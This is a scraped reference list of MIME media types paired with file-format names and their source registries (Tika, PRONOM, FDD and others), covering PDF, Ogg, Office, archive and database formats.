application/mbms-user-service-description+xmlapplication/mbms-user-service-description+xml tika
application/media_control+xmlapplication/media_control+xml tika
application/mediaservercontrol+xmlapplication/mediaservercontrol+xml tika
application/mikeyapplication/mikey tika
application/moss-keysapplication/moss-keys tika
application/moss-signatureapplication/moss-signature tika
application/mosskey-dataapplication/mosskey-data tika
application/mosskey-requestapplication/mosskey-request tika
application/mp4application/mp4 tika
MPEG-4 Media File pronom
MPEG-4 File Format, Version 2 fdd
application/mpeg4-genericapplication/mpeg4-generic tika
application/mpeg4-iodapplication/mpeg4-iod tika
MPEG-4 File Format, Version 2 fdd
application/mpeg4-iod-xmtapplication/mpeg4-iod-xmt tika
MPEG-4, eXtensible MPEG-4 Textual Format (XMT) fdd
MPEG-4 File Format, Version 2 fdd
application/ms-tnefapplication/ tika
application/msonenoteMicrosoft OneNote pronom
application/msword2Microsoft Word 2 Document tika
application/msword5Microsoft Word 5 Document tika
application/mxfMXF ffw
application/mxf tika
Material Exchange Format (MXF) fdd
—  application/mxf; version=”operational pattern 1a”Material Exchange Format Operational Pattern 1a pronom
—  application/mxf; version=”operational pattern 1b”Material Exchange Format Operational Pattern 1b pronom
—  application/mxf; version=”operational pattern 1c”Material Exchange Format Operational Pattern 1c pronom
—  application/mxf; version=”operational pattern 2a”Material Exchange Format Operational Pattern 2a pronom
—  application/mxf; version=”operational pattern 2b”Material Exchange Format Operational Pattern 2b pronom
—  application/mxf; version=”operational pattern 2c”Material Exchange Format Operational Pattern 2c pronom
—  application/mxf; version=”operational pattern 3a”Material Exchange Format Operational Pattern 3a pronom
—  application/mxf; version=”operational pattern 3b”Material Exchange Format Operational Pattern 3b pronom
—  application/mxf; version=”operational pattern 3c”Material Exchange Format Operational Pattern 3c pronom
—  application/mxf; version=”operational pattern op-atom”Material Exchange Format Operational Pattern OP-ATOM pronom
application/nasdataapplication/nasdata tika
application/netcdfNetCDF ffw
netCDF-3 Classic pronom
netCDF-3 64-bit pronom
application/news-checkgroupsapplication/news-checkgroups tika
application/news-groupinfoapplication/news-groupinfo tika
application/news-transmissionapplication/news-transmission tika
application/nssapplication/nss tika
application/ocsp-requestapplication/ocsp-request tika
application/ocsp-responseapplication/ocsp-response tika
application/octet-streamTemplate:File Format/Preload ffw
application/octet-stream tika
Windows Portable Executable pronom
AutoCAD Database File Locking Information pronom
form*Z Project File pronom
Revit Family File pronom
Revit Family Template pronom
Revit Template pronom
Revit External Group pronom
Revit Project pronom
Revit Workspace pronom
SketchUp Document pronom
TrueType Font pronom
cc:Mail Archive Email Format fdd
—  application/octet-stream; version=”32 bit”Windows Portable Executable 32 bit pronom
—  application/octet-stream; version=”4″CATIA Model 4 pronom
CATIA Project 4 pronom
—  application/octet-stream; version=”5″CATIA 5 pronom
CATIA Model (Part Description) 5 pronom
CATIA Product Description 5 pronom
—  application/octet-stream; version=”64 bit”Windows Portable Executable 64 bit pronom
—  application/octet-stream; version=”generic”Adobe InDesign Document Generic pronom
application/odaapplication/oda tika
application/oebps-package+xmlapplication/oebps-package+xml tika
application/oggOgg ffw
Vorbis ffw
Ogg Skeleton ffw
application/ogg tika
Ogg Multimedia Container pronom
Ogg File Format fdd
Ogg Vorbis Audio Format fdd
—  application/kateKate ffw
application/kate tika
—  audio/oggOgg ffw
Speex ffw
Vorbis ffw
Ogg Skeleton ffw
Ogg Vorbis Audio tika
Ogg Vorbis Codec Compressed Multimedia File pronom
Ogg Opus Codec Compressed Multimedia File pronom
Ogg FLAC Compressed Multimedia File pronom
Ogg Speex Codec Multimedia File pronom
— —  application/x-oggapplication/ogg tika
Ogg Vorbis Codec Compressed WAV File tika
Ogg File Format fdd
Ogg Vorbis Audio Format fdd
— —  application/x-speexOgg Speex Codec Compressed WAV File tika
— —  audio/opusOgg Opus Codec Compressed WAV File tika
Ogg Opus Codec Compressed Multimedia File pronom
— —  audio/speexOgg Speex Codec Compressed WAV File tika
Ogg Speex Codec Multimedia File pronom
Speex Audio Codec, Version 1.2 fdd
Ogg Speex Audio Format fdd
— —  audio/vorbisOgg Vorbis Codec Compressed WAV File tika
— —  audio/x-ogg-flacOgg Packaged Free Lossless Audio Codec tika
— —  audio/x-ogg-pcmOgg Packaged Unompressed WAV File tika
— —  audio/x-oggflacOgg Packaged Free Lossless Audio Codec tika
— —  audio/x-oggpcmOgg Packaged Unompressed WAV File tika
—  video/oggOgg ffw
Ogg Skeleton ffw
Ogg Vorbis Video tika
Ogg Theora Video pronom
— —  video/daalaOgg Daala Video tika
— —  video/theoraOgg Theora Video tika
— —  video/x-daalaOgg Daala Video tika
— —  video/x-diracOgg Packaged Dirac Video tika
— —  video/x-ogg-rgbOgg Packaged Raw RGB Video tika
— —  video/x-ogg-uvsOgg Packaged Raw UVS Video tika
— —  video/x-ogg-yuvOgg Packaged Raw YUV Video tika
— —  video/x-oggrgbOgg Packaged Raw RGB Video tika
— —  video/x-ogguvsOgg Packaged Raw UVS Video tika
— —  video/x-oggyuvOgg Packaged Raw YUV Video tika
— —  video/x-ogmOgg Packaged OGM Video tika
— —  video/x-theoraOgg Theora Video tika
application/onenoteapplication/onenote tika
application/packagePackage (Web) ffw
application/parityfecapplication/parityfec tika
application/patch-ops-error+xmlapplication/patch-ops-error+xml tika
application/pdfPDF ffw
Portable Document Format tika
Acrobat PDF/X – Portable Document Format – Exchange 1:1999 pronom
Acrobat PDF/X – Portable Document Format – Exchange 1:2001 pronom
Acrobat PDF/X – Portable Document Format – Exchange 1a:2003 pronom
Acrobat PDF/X – Portable Document Format – Exchange 2:2003 pronom
Acrobat PDF/X – Portable Document Format – Exchange 3:2003 pronom
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Acrobat PDF/X – Portable Document Format – Exchange PDF/X-5pg pronom
Acrobat PDF/X – Portable Document Format – Exchange PDF/X-5n pronom
Acrobat PDF/E – Portable Document Format for Engineering PDF/E-1 pronom
PDF, Version 1.5 fdd
PDF_1_3, PDF Versions 1.0-1.3 fdd
PDF, Version 1.7 (ISO 32000-1:2008) fdd
PDF, Version 1.6 fdd
PDF 2.0, ISO 32000-2 (2017, 2020) fdd
PDF (Portable Document Format) Family fdd
PDF/R-1, (Raster image transport and storage). Encrypted, based on PDF 2.0 (ISO 32000-2) fdd
PDF/A-1, PDF for Long-term Preservation, Use of PDF 1.4 fdd
PDF/R-1 (Raster image transport and storage.) Based on PDF 1.4-1.7 (ISO 32000-1) fdd
PDF_1_4, PDF Version 1.4 fdd
—  application/pdf; version=”1.0″Acrobat PDF 1.0 – Portable Document Format 1.0 pronom
—  application/pdf; version=”1.1″Acrobat PDF 1.1 – Portable Document Format 1.1 pronom
—  application/pdf; version=”1.2″Acrobat PDF 1.2 – Portable Document Format 1.2 pronom
—  application/pdf; version=”1.3″Acrobat PDF 1.3 – Portable Document Format 1.3 pronom
—  application/pdf; version=”1.4″Acrobat PDF 1.4 – Portable Document Format 1.4 pronom
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—  application/pdf; version=”1.6″Acrobat PDF 1.6 – Portable Document Format 1.6 pronom
—  application/pdf; version=”1.7″Acrobat PDF 1.7 – Portable Document Format 1.7 pronom
—  application/pdf; version=”1a”Acrobat PDF/A – Portable Document Format 1a pronom
—  application/pdf; version=”1b”Acrobat PDF/A – Portable Document Format 1b pronom
—  application/pdf; version=”2a”Acrobat PDF/A – Portable Document Format 2a pronom
—  application/pdf; version=”2b”Acrobat PDF/A – Portable Document Format 2b pronom
—  application/pdf; version=”2u”Acrobat PDF/A – Portable Document Format 2u pronom
—  application/pdf; version=”3a”Acrobat PDF/A – Portable Document Format 3a pronom
—  application/pdf; version=”3b”Acrobat PDF/A – Portable Document Format 3b pronom
—  application/pdf; version=”3u”Acrobat PDF/A – Portable Document Format 3u pronom
application/pgpapplication/pgp-encrypted tika
Public Key githublinguist
application/pgp-encryptedapplication/pgp-encrypted tika
application/pgp-keysapplication/pgp-keys tika
application/pgp-signatureapplication/pgp-signature tika
application/photoshopPhotoshop Image tika
application/pics-rulesapplication/pics-rules tika
application/pidf+xmlapplication/pidf+xml tika
application/pidf-diff+xmlapplication/pidf-diff+xml tika
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Visio VSDX Drawing File Format fdd
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—  application/vnd.wordperfect; version=”6.0″WordPerfect for MS-DOS/Windows Document 6.0 pronom
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WARC, Web ARChive file format fdd
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application/x-3ds3DS ffw
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7-zip archive tika
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AutoCad Drawing tika
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application/x-apple-diskimage tika
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application/x-debian-package tika
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application/x-aspxASP.NET githublinguist
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application/x-autocadDWG ffw
AutoCad Drawing tika
application/x-axcryptAxCrypt tika
application/x-b6z-compressedB6Z ffw
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application/x-berkeley-dbBerkeley DB tika
—  application/x-berkeley-db;format=btreeBerkeley DB BTree Database tika
— —  application/x-berkeley-db;format=btree;version=2Berkeley DB Version 2 BTree Database tika
— —  application/x-berkeley-db;format=btree;version=3Berkeley DB Version 3 BTree Database tika
— —  application/x-berkeley-db;format=btree;version=4Berkeley DB Version 4 and 5 BTree Database tika
—  application/x-berkeley-db;format=hashBerkeley DB Hash Database tika
— —  application/x-berkeley-db;format=hash;version=2Berkeley DB Version 2 Hash Database tika
— —  application/x-berkeley-db;format=hash;version=3Berkeley DB Version 3 Hash Database tika
— —  application/x-berkeley-db;format=hash;version=4Berkeley DB Version 4 Hash Database tika
— —  application/x-berkeley-db;format=hash;version=5Berkeley DB Version 5 Hash Database tika
—  application/x-berkeley-db;format=logBerkeley DB Log Database tika
—  application/x-berkeley-db;format=queueBerkeley DB Queue Database tika
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application/x-bittorrent tika
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—  application/x-bzip2Bzip2 ffw
Bzip 2 UNIX Compressed File tika
BZIP2 Compressed Archive pronom
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application/x-cdfCD Audio pronom
application/x-cdlinkVirtual CD-ROM CD Image File tika
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application/x-chatapplication/x-chat tika
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application/x-chess-pgn tika
application/x-chrome-packageChrome Extension Package tika
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application/x-compress tika
Tape Archive (tar) File Format Family fdd
application/x-compressedTape Archive (tar) File Format Family fdd
application/x-cpioCpio ffw
UNIX CPIO Archive tika
application/x-cshapplication/x-csh tika
application/x-csvCSV ffw
application/x-dbasedBASE Table File Format (DBF) fdd
application/x-dbfdBASE Table File Format (DBF) fdd
application/x-dbmBerkeley DB tika
application/x-deflateZLIB Compressed Data Format tika
application/x-dexDalvik Executable Format tika
application/x-dgc-compressedDGCA ffw
application/x-directorShockwave (Director) ffw
Shockwave Movie tika
—  application/x-director; version=”macintosh”Macromedia Director Macintosh pronom
—  application/x-director; version=”pc”Macromedia Director PC pronom
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application/x-dtbncx+xmlapplication/x-dtbncx+xml tika
DTB (Digital Talking Book), 2005 fdd
application/x-dtbook+xmlapplication/x-dtbook+xml tika
DTB (Digital Talking Book), 2005 fdd
application/x-dtbresource+xmlapplication/x-dtbresource+xml tika
application/x-dviDVI (Device Independent File Format) ffw
TeX Device Independent Document tika
TeX Binary File pronom
TeX/LaTeX Device Independent Document pronom
application/x-dwgDWG ffw
AutoCad Drawing tika
application/x-elcEmacs Lisp bytecode tika
application/x-elfapplication/x-elf tika
—  application/x-coredumpapplication/x-coredump tika
—  application/x-executableapplication/x-executable tika
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—  application/x-sharedlibapplication/x-sharedlib tika
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application/x-endnote-connectionEndNote Connection File pronom
application/x-endnote-referEndNote Import File pronom
application/x-endnote-styleEndNote Style File pronom
application/x-erbHTML+ERB githublinguist
application/x-filemakerFileMaker Pro 7 tika
—  application/x-filemaker; version=”3″FileMaker Pro Database 3 pronom
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application/x-font-bdfapplication/x-font-bdf tika
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application/x-foxmailFoxmail Email File tika
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application/x-freemindMm ffw
application/x-futuresplashMacromedia FutureSplash File tika
application/x-gca-compressedGCA ffw
application/x-glulxGlulx ffw
application/x-gnucashapplication/x-gnucash tika
application/x-gnumericGnumeric ffw
application/x-gnumeric tika
application/x-gnumeric-spreadsheetapplication/x-gnumeric tika
application/x-gribGeneral Regularly-distributed Information in Binary form tika
application/x-gunzipGzip Compressed Archive tika
application/x-gzipGzip ffw
Unity package file ffw
Gzip Compressed Archive tika
GZIP Format pronom
—  application/x-ms-wmzapplication/x-ms-wmz tika
application/x-gzip-compressedGzip Compressed Archive tika
application/x-hdfHDF ffw
HDF4 ffw
Hierarchical Data Format File tika
HDF4, Hierarchical Data Format, Version 4 and earlier fdd
application/x-httpd-phpHTML+PHP githublinguist
PHP githublinguist
Hack githublinguist
application/x-hwpHangul Word Processor File tika
application/x-internet-archive; version=”1.0″Internet Archive 1.0 pronom
application/x-isatabISA-Tab Study file tika
application/x-isatab-assayISA-Tab Assay file tika
application/x-isatab-investigationISA-Tab Investigation file tika
application/x-iso9660-imageISO image ffw
ISO 9660 ffw
ISO 9660 CD-ROM filesystem data tika
ISO Disk Image File Format fdd
—  application/x-roxio-toastTOAST ffw
application/x-roxio-toast tika
application/x-javaJava Class File tika
application/x-java-jnilibJava Native Library for OSX tika
application/x-java-jnlp-fileJava Network Launching Protocol ffw
application/x-java-jnlp-file tika
application/x-java-pack200application/x-java-pack200 tika
application/x-java-vmJava Class File tika
application/x-jpgJFIF, JPEG File Interchange Format, Version 1.02 fdd
application/x-jspGroovy Server Pages githublinguist
Java Server Pages githublinguist
application/x-kchartKChart File tika
application/x-kdelnkapplication/x-kdelnk tika
application/x-killustratorKIllustrator File tika
application/x-koanSSEYO Koan File tika
application/x-kpresenterKPresenter File tika
application/x-kritaKrita ffw
Krita Document Format pronom
application/x-kspreadKSpread File tika
application/x-kwordKWord File tika
application/x-lhaapplication/x-lha tika
application/x-lharcapplication/x-lharc tika
application/x-lotus-notesNotes Storage Facility ffw
Lotus Notes Storage Facility fdd
application/x-lzh-compressedLHA ffw
application/x-lzipLzip ffw
application/x-lzmaLZMA Alone ffw
application/x-macbinaryMacBinary ffw
application/x-maffMAFF ffw
application/x-matlab-dataMAT ffw
Matlab figure ffw
application/x-matlab-data tika
MAT-File Level 5 File Format fdd
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—  audio/x-matroskaaudio/x-matroska tika
—  video/webmWebM ffw
video/webm tika
WebM pronom
WebM fdd
—  video/x-matroskaMKV ffw
video/x-matroska tika
application/x-midiMIDI ffw
Standard MIDI File Format fdd
application/x-mifFrameMaker Interchange Format tika
application/x-mobipocket-ebookapplication/x-mobipocket-ebook tika
Mobipocket File Format fdd
application/x-mplayer2ASF (Advanced Systems Format) fdd
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application/x-ms-wmdapplication/x-ms-wmd tika
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—  application/x-dosexecDOS/Windows executable (EXE) tika
—  application/x-msdownload;format=peapplication/x-msdownload;format=pe tika
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— —  application/x-msdownload;format=pe-itaniumapplication/x-msdownload;format=pe-itanium tika
— —  application/x-msdownload;format=pe32application/x-msdownload;format=pe32 tika
— —  application/x-msdownload;format=pe64application/x-msdownload;format=pe64 tika
application/x-msmediaviewapplication/x-msmediaview tika
application/x-msmetafileWindows Metafile tika
application/x-msmoneyapplication/x-msmoney tika
application/x-msoActiveMime ffw
application/x-mspublisherapplication/x-mspublisher tika
application/x-msscheduleapplication/x-msschedule tika
application/x-msterminalapplication/x-msterminal tika
application/x-mswriteapplication/x-mswrite tika
application/x-mysql-dbapplication/x-mysql-db tika
—  application/x-mysql-misam-compressed-indexMySQL MISAM Compressed Index tika
—  application/x-mysql-misam-dataMySQL MISAM Data tika
—  application/x-mysql-misam-indexMySQL MISAM Index tika
—  application/x-mysql-table-definitionMySQL Table Definition (Format) tika
application/x-navi-animationWindows Animated Cursor ffw
application/x-netcdfapplication/x-netcdf tika
netCDF-3 Classic pronom
netCDF-3 64-bit pronom
NetCDF-3 (Network Common Data Form, version 3) fdd
application/x-ofx; version=”1.02″Open Financial Exchange 1.02 pronom
application/x-ofx; version=”1.03″Open Financial Exchange 1.03 pronom
application/x-ofx; version=”1.6″Open Financial Exchange 1.6 pronom
application/x-ofx; version=”2.0.3″Open Financial Exchange 2.0.3 pronom
application/x-ofx; version=”2.1.1″Open Financial Exchange 2.1.1 pronom
application/x-pdfPortable Document Format tika
PDF (Portable Document Format) Family fdd
application/x-pkcs12application/x-pkcs12 tika
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application/x-pkcs7-certreqrespapplication/x-pkcs7-certreqresp tika
application/x-pn-mpgMPEG-2 Video Encoding (H.262) fdd
MPEG-1 Video Coding (H.261) fdd
MPEG-2 Encoding Family fdd
application/x-powershellPowerShell githublinguist
application/x-prtapplication/x-prt tika
application/x-rarRAR archive tika
application/x-rar-compressedRAR ffw
RAR archive tika
RAR Archive File Format Family fdd
application/x-riffMIDI Instrument Definition File ffw
application/x-rpmRedHat Package Manager tika
application/x-sas-accessSAS Access Descriptor tika
application/x-sas-auditSAS Audit tika
application/x-sas-backupSAS Backup tika
application/x-sas-catalogSAS Catalog tika
application/x-sas-dataSAS Data Set tika
application/x-sas-data-indexSAS Data Set Index tika
application/x-sas-dmdbSAS DMDB Data Mining Database File tika
application/x-sas-fdbSAS FDB Consolidation Database File tika
application/x-sas-itemstorSAS Item Store (ItemStor) File tika
application/x-sas-mddbSAS MDDB Multi-Dimensional Database File tika
application/x-sas-program-dataSAS Stored Program (DATA Step) tika
application/x-sas-putilitySAS Permanent Utility tika
application/x-sas-transportSAS Transport File tika
application/x-sas-utilitySAS Utility tika
application/x-sas-viewSAS Data Set View tika
application/x-sas-xportSAS Transport File Format (XPORT) Family fdd
application/x-scapplication/x-sc tika
application/x-sharapplication/x-shar tika
Shell Archive Format pronom
application/x-shockwave-flashSWF ffw
Adobe Flash tika
Macromedia Flash SWF File Format, Version 7 fdd
Macromedia Flash SWF File Format, Version 8 fdd
—  application/x-shockwave-flash; version=”1″Macromedia Flash 1 pronom
—  application/x-shockwave-flash; version=”10″Adobe Flash 10 pronom
—  application/x-shockwave-flash; version=”11″Adobe Flash 11 pronom
—  application/x-shockwave-flash; version=”12″Adobe Flash 12 pronom
—  application/x-shockwave-flash; version=”13″Adobe Flash 13 pronom
—  application/x-shockwave-flash; version=”14″Adobe Flash 14 pronom
—  application/x-shockwave-flash; version=”15″Adobe Flash 15 pronom
—  application/x-shockwave-flash; version=”16″Adobe Flash 16 pronom
—  application/x-shockwave-flash; version=”17″Adobe Flash 17 pronom
—  application/x-shockwave-flash; version=”18″Adobe Flash 18 pronom
—  application/x-shockwave-flash; version=”19″Adobe Flash 19 pronom
—  application/x-shockwave-flash; version=”2″Macromedia Flash 2 pronom
—  application/x-shockwave-flash; version=”20″Adobe Flash 20 pronom
—  application/x-shockwave-flash; version=”21″Adobe Flash 21 pronom
—  application/x-shockwave-flash; version=”22″Adobe Flash 22 pronom
—  application/x-shockwave-flash; version=”23″Adobe Flash 23 pronom
—  application/x-shockwave-flash; version=”24″Adobe Flash 24 pronom
—  application/x-shockwave-flash; version=”25″Adobe Flash 25 pronom
—  application/x-shockwave-flash; version=”26″Adobe Flash 26 pronom
—  application/x-shockwave-flash; version=”27″Adobe Flash 27 pronom
—  application/x-shockwave-flash; version=”28″Adobe Flash 28 pronom
—  application/x-shockwave-flash; version=”29″Adobe Flash 29 pronom
—  application/x-shockwave-flash; version=”3″Macromedia Flash 3 pronom
—  application/x-shockwave-flash; version=”30″Adobe Flash 30 pronom
—  application/x-shockwave-flash; version=”4″Macromedia Flash 4 pronom
—  application/x-shockwave-flash; version=”5″Macromedia Flash 5 pronom
—  application/x-shockwave-flash; version=”6″Macromedia Flash 6 pronom
—  application/x-shockwave-flash; version=”7″Macromedia Flash 7 pronom
—  application/x-shockwave-flash; version=”8″Adobe Flash 8 pronom
—  application/x-shockwave-flash; version=”9″Adobe Flash 9 pronom
application/x-silverlight-appSilverlight ffw
application/x-silverlight-app tika
application/x-sitStuffIt ffw
application/x-sitxStuffIt X ffw
application/x-sldAutoCAD Slide pronom
application/x-snappy-framedSnappy ffw
Snappy Framed tika
application/x-spss-porSPSS Portable File, ASCII encoding fdd
application/x-spss-savSAV ffw
SPSS System Data File Format Family (.sav) fdd
application/x-sqlite3SQLite ffw
application/x-sqlite3 tika
SQLite Database File Format pronom
application/x-starcalcSDC ffw
application/x-stardrawSDA (StarOffice) ffw
application/x-starwriterSDW ffw
application/x-stuffitStuffIt ffw
application/x-stuffit tika
application/x-stuffitxStuffIt X ffw
application/x-stuffitx tika
application/x-sv4cpioapplication/x-sv4cpio tika
application/x-sv4crcapplication/x-sv4crc tika
application/x-t3vm-imageTADS 3 ffw
application/x-tadsTADS ffw
application/x-tarTape Archive ffw
application/x-tar tika
Tape Archive Format pronom
Tape Archive (tar) File Format Family fdd
—  application/x-gtarGNU tar Compressed File Archive (GNU Tape Archive) tika
Tape Archive (tar) File Format Family fdd
application/x-tex-tfmapplication/x-tex-tfm tika
application/x-texinfoapplication/x-texinfo tika
application/x-tifTIFF, Revision 6.0 fdd
application/x-tiffTIFF, Revision 6.0 fdd
application/x-tika-msofficeapplication/x-tika-msoffice tika
—  application/msexcelMicrosoft Excel Spreadsheet tika
—  application/mspowerpointMicrosoft Powerpoint Presentation tika
—  application/mswordDOC ffw
Microsoft Word ffw
Microsoft Word ffw
Microsoft Word ffw
Microsoft Word ffw
Microsoft Word for Macintosh ffw
Microsoft Word Document tika
Microsoft Office Word 97-2003 Binary File Format (.doc) fdd
— —  application/msword; version=”1.0″Microsoft Word for Windows Document 1.0 pronom
Microsoft Word for Macintosh Document 1.0 pronom
— —  application/msword; version=”2.0″Microsoft Word for Windows Document 2.0 pronom
— —  application/msword; version=”3.0″Microsoft Word for Macintosh Document 3.0 pronom
Microsoft Word for MS-DOS Document 3.0 pronom
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Microsoft Word for MS-DOS Document 4.0 pronom
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Microsoft Word for MS-DOS Document 5.0 pronom
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Microsoft Word Document (Password Protected) 97-2003 pronom
Microsoft Word Document Template (Password Protected) 97-2003 pronom
—  application/sldworksSolidWorks CAD program tika
—  application/ ffw
Microsoft Excel ffw
Microsoft Excel ffw
Microsoft Excel ffw
Microsoft Excel ffw
XLM ffw
Microsoft Excel Spreadsheet tika
Microsoft Office Excel 97-2003 Binary File Format (.xls, BIFF8) fdd
— —  application/; version=”2″Microsoft Excel 2.x Worksheet (xls) 2 pronom
— —  application/; version=”2.x”Microsoft Excel Chart 2.x pronom
Microsoft Excel Macro 2.x pronom
— —  application/; version=”3″Microsoft Excel 3.0 Worksheet (xls) 3 pronom
— —  application/; version=”3.0″Microsoft Excel Chart 3.0 pronom
Microsoft Excel Macro 3.0 pronom
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— —  application/; version=”4s”Microsoft Excel 4.0 Worksheet (xls) 4S pronom
— —  application/; version=”4w”Microsoft Excel 4.0 Workbook (xls) 4W pronom
— —  application/; version=”5/95″Microsoft Excel 5.0/95 Workbook (xls) 5/95 pronom
— —  application/; version=”8″Microsoft Excel 97 Workbook (xls) 8 pronom
— —  application/; version=”8x”Microsoft Excel 2000-2003 Workbook (xls) 8X pronom
— —  application/x-tika-msworks-spreadsheetapplication/x-tika-msworks-spreadsheet tika
—  application/ Folder File ffw
Microsoft Outlook Message tika
Microsoft Outlook PST 97-2002 (ANSI) fdd
Microsoft Outlook Item (MSG) fdd
—  application/ ffw
Microsoft PowerPoint ffw
Microsoft Powerpoint Presentation tika
Microsoft Office PowerPoint 97-2003 Binary File Format (.ppt) fdd
— —  application/; version=”4.0″Microsoft Powerpoint Presentation 4.0 pronom
— —  application/; version=”95″Microsoft Powerpoint Presentation 95 pronom
— —  application/; version=”97-2003″Microsoft Powerpoint Presentation Show 97-2003 pronom
Microsoft Powerpoint Presentation 97-2003 pronom
—  application/ tika
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— —  application/; version=”2007″Microsoft Project 2007 pronom
— —  application/; version=”2010″Microsoft Project 2010 pronom
— —  application/; version=”4.0″Microsoft Project 4.0 pronom
— —  application/; version=”95″Microsoft Project 95 pronom
— —  application/; version=”98″Microsoft Project 98 pronom
—  application/ Visio Diagram tika
—  application/ ffw
Microsoft Word Document tika
—  application/ tika
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Microsoft Visio Diagram tika
Microsoft Visio (generic) pronom
Visio VSDX Drawing File Format fdd
Visio VSDX Drawing File Format fdd
— —  application/vnd.visio; version=”2000″Microsoft Visio Drawing 2000 pronom
— —  application/vnd.visio; version=”2002″Microsoft Visio Drawing 2002 pronom
— —  application/vnd.visio; version=”2003-2010″Microsoft Visio XML Drawing 2003-2010 pronom
Microsoft Visio Drawing 2003-2010 pronom
— —  application/vnd.visio; version=”5.0″Microsoft Visio Drawing 5.0 pronom
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—  application/x-msiMicrosoft Windows Installer tika
—  application/x-quattro-proapplication/x-quattro-pro tika
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— —  application/x-tika-msoffice-embedded;format=ole10_nativeOLE10 Native Embedded Document tika
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StarOffice binary formats ffw
application/vnd.stardivision.calc tika
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SDA (StarOffice) ffw
application/vnd.stardivision.draw tika
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application/vnd.stardivision.impress tika
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StarOffice binary formats ffw
application/vnd.stardivision.writer tika
— — —  application/vnd.stardivision.writer; version=”5.x”StarOffice Writer 5.x pronom
— —  application/x-staroffice-templateapplication/x-staroffice-template tika
—  application/x-windows-installerMicrosoft Windows Installer tika
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—  application/ Excel 2 Worksheet tika
—  application/ Excel 3 Worksheet tika
—  application/ Excel 4 Worksheet tika
—  application/ Excel 3 Workspace tika
—  application/ Excel 4 Workspace tika
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application/x-troffRoff/nroff/troff/groff Unformatted Manual Page (UNIX) tika
application/x-troff-manRoff/nroff/troff/groff Unformatted Manual Page (UNIX) tika
application/x-troff-meRoff/nroff/troff/groff Unformatted Manual Page (UNIX) tika
application/x-troff-msRoff/nroff/troff/groff Unformatted Manual Page (UNIX) tika
application/x-troff-msvideoAVI (Audio Video Interleaved) File Format fdd
application/x-uc2-compressedapplication/x-uc2-compressed tika
application/x-unix-archiveapplication/x-archive tika
application/x-urlInternet Shortcut ffw
application/x-ustarapplication/x-ustar tika
application/x-vhdVirtual PC Virtual Hard Disk tika
application/x-vmdkVirtual Disk Format tika
application/x-vnd.corel.designer.document+zipCorel Designer ffw
application/x-vnd.corel.zcf.designer.document+zipCorel Designer ffw
application/x-vnd.oasis.opendocument.chartOpenDocument v1.0: Chart document tika
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application/ v1.0: Graphics document used as template tika
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application/x-vnd.oasis.opendocument.spreadsheetOpenDocument v1.0: Spreadsheet document tika
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application/x-vnd.oasis.opendocument.text-webOpenDocument v1.0: Text document used as template for HTML documents tika
application/x-vnd.sun.xml.writerOpenOffice v1.0: Writer Document tika
application/x-votable+xmlVOTable ffw
application/x-wais-sourceapplication/x-wais-source tika
application/x-web-app-manifest+jsonOpen Web App Manifest ffw
application/x-www-form-urlencodedForm URL encoding ffw
application/x-x509-ca-certDER encoded certificate ffw
application/x-x509-ca-cert tika
application/x-x509-user-certDER encoded certificate ffw
application/x-xfigapplication/x-xfig tika
application/x-xpinstallCross-Platform Installer Module ffw
application/x-xpinstall tika
application/x-xzXZ ffw
application/x-xz tika
application/x-zip-compressedCompressed Archive File tika
application/x-zooZoo ffw
application/x-zoo tika
application/x400-bpapplication/x400-bp tika
application/xcap-att+xmlapplication/xcap-att+xml tika
application/xcap-caps+xmlapplication/xcap-caps+xml tika
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application/xcap-error+xmlapplication/xcap-error+xml tika
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application/xcon-conference-info-diff+xmlapplication/xcon-conference-info-diff+xml tika
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application/xhtml+xmlHTML ffw
application/xhtml+xml tika
HyperText Markup Language (HTML) 5 fdd
Extensible HyperText Markup Language (XHTML), 1.0 fdd
—  application/xhtml+xml; version=”1.0″Extensible Hypertext Markup Language 1.0 pronom
—  application/xhtml+xml; version=”1.1″Extensible Hypertext Markup Language 1.1 pronom
application/xhtml-voice+xmlapplication/xhtml-voice+xml tika
application/xml-external-parsed-entityapplication/xml-external-parsed-entity tika
application/xmpp+xmlapplication/xmpp+xml tika
application/xop+xmlapplication/xop+xml tika
application/xslfo+xmlXSL Format tika
application/xslt+xmlXSL Transformations tika
application/xspf+xmlXML Shareable Playlist Format tika
application/xv+xmlapplication/xv+xml tika
application/zipZIP ffw
Compressed Archive File tika
ZIP Format pronom
ZIP File Format (PKWARE) fdd
ZIP File Format, Version 6.3.3 (PKWARE) fdd
Document Container File: Core (based on ZIP 6.3.3) fdd
ZIP File Format, Version 6.2.0 (PKWARE) fdd
—  application/bizagi-modelerBizAgi Process Modeler tika
—  application/java-archiveJava Archive tika
Java Archive Format pronom
— —  application/ tika
— —  application/x-tika-java-enterprise-archiveapplication/x-tika-java-enterprise-archive tika
— —  application/x-tika-java-web-archiveapplication/x-tika-java-web-archive tika
—  application/ tika
— —  application/ tika
— —  application/ tika
— —  application/ tika
— —  application/x-tika-iworks-protectedPassword Protected iWorks File tika
—  application/vnd.etsi.asic-e+zipExtended Associated Signature Container tika
—  application/vnd.etsi.asic-s+zipSimple Associated Signature Container tika
—  application/ ffw
application/ tika
Keyhole Markup Language (Container) pronom
—  application/vnd.mindjet.mindmanagerMindManager tika
—  application/vnd.oasis.opendocument.formulaOpenDocument ffw
OpenDocument v1.0: Formula document tika
—  application/x-itunes-ipaApple iOS IPA AppStore file tika
—  application/x-tika-ooxmlapplication/x-tika-ooxml tika
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Open XML Paper Specification tika
Open XML Paper Specification pronom
Open XML Paper Specification, (OpenXPS), ECMA-388 (.oxps) fdd
— —  application/ Excel ffw
Office Open XML Workbook Add-in (macro-enabled) tika
— —  application/ Excel ffw
Microsoft Excel 2007 Binary Spreadsheet tika
Microsoft Excel Binary (XLSB) Format (option in Excel 2007 and later) fdd
— —  application/ Excel ffw
Office Open XML Workbook (macro-enabled) tika
— —  application/ Excel ffw
Office Open XML Workbook Template (macro-enabled) tika
— —  application/ PowerPoint ffw
Office Open XML Presentation Add-in (macro-enabled) tika
— —  application/ PowerPoint ffw
Office Open XML Presentation (macro-enabled) tika
— —  application/ PowerPoint ffw
application/ tika
— —  application/ PowerPoint ffw
Office Open XML Presentation Slideshow (macro-enabled) tika
— —  application/ PowerPoint ffw
application/ tika
— —  application/ Word ffw
Office Open XML Document (macro-enabled) tika
— —  application/ Word ffw
Office Open XML Document Template (macro-enabled) tika
— —  application/ ffw
Open XML Paper Specification tika
Microsoft XML Paper Specification, (XPS) fdd
— —  application/vnd.openxmlformats-officedocument.presentationml.presentationPPTX ffw
Microsoft PowerPoint ffw
Office Open XML Presentation tika
PPTX Strict (Office Open XML), ISO 29500-1: 2008-2016 fdd
